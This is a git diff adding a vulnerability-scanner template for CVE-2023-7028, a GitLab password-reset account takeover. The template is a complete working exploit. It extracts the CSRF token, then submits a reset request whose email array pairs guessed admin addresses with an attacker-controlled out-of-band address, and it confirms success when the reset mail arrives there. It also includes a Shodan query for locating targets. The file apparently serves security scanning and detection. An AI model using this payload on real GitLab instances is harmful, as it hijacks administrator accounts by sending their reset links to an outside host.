diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml new file mode 100644 index 0000000000..0849003a55 --- /dev/null +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -0,0 +1,72 @@ +id: CVE-2023-7028 + +info: + name: GitLab - Account Takeover via Password Reset + author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch + severity: critical + description: | + An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. + reference: + - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ + - https://x.com/rwincey/status/1745659710089437368?s=20 + - https://gitlab.com/gitlab-org/gitlab/-/issues/436084 + - https://hackerone.com/reports/2293343 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N + cvss-score: 10 + cve-id: CVE-2023-7028 + cwe-id: CWE-284 + metadata: + verified: true + max-request: 2 + vendor: gitlab + product: gitlab + shodan-query: title:"Gitlab" + tags: cve,cve2023,gitlab,auth-bypass,intrusive +flow: | + http(1); + set("token", template["token"][0]); + http(2); + +http: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: token + group: 1 + regex: + - name="authenticity_token" value="([A-Za-z0-9_-]+)" + internal: true + + - raw: + - | + @timeout: 20s + POST /users/password HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/users/password/new + + authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}} + + payloads: + username: + - admin@example.com + - admin@{{RDN}} + - root@{{RDN}} + - gitlab@{{RDN}} + - git@{{RDN}} + + matchers: + - type: dsl + dsl: + - contains(interactsh_protocol, 'smtp') + + extractors: + - type: dsl + dsl: + - username